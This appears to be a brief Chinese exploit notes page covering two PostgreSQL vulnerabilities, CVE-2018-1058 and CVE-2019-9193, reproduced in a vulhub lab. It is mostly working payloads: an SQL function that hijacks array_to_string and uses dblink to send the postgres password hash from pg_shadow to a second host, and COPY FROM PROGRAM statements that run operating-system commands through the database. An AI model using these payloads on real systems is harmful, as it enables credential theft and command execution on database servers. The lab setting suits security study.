Close

23 6 月, 2024

(CVE-2018-1058)(CVE-2019-9193)

PostgreSQL 提权漏洞(CVE-2018-1058)

psql –host 192.168.85.130 –username vulhub

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$select dblink_connect((select ‘hostaddr=192.168.85.132 port=5433 user=postgres password=chybeta sslmode=disable dbname=’||(SELECT passwd FROM pg_shadow WHERE usename=’postgres’)));SELECT pg_catalog.array_to_string($1,$2);$$ LANGUAGE SQL VOLATILE;

docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)

影响范围:PostgreSQL 9.3.x以及更早版本和11.x版本

sql攻击语法

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text); 
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

计算机生成了可选文字: root@kali、#psqI..h05t192.168.85.130 .u5ername 用户postgres的口一令: psql(12.3(Debian12.3.1+b1),月务暑10.7(Debian 输入"help"来获取帮助信息 postgres 10.7.1.pgdg90+1))